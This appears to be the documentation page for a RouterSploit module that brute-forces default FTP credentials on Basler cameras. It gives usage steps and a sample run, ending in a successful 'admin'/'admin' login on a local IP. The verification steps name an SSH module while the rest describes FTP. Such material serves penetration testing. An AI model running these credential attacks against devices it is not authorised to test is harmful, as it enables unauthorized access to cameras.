Description
Module performs dictionary attack with default credentials against Basler Camera FTP service. If valid credentials are found, they are displayed to the user.
Verification Steps
- Start
./rsf.py - Do:
use creds/cameras/basler/ssh_default_creds - Do:
set target [TargetIP] - Do:
run - If valid credentials are found, they are displayed to the user.
Scenarios
rsf > use creds/cameras/basler/ftp_default_creds
rsf (Basler Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Basler Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin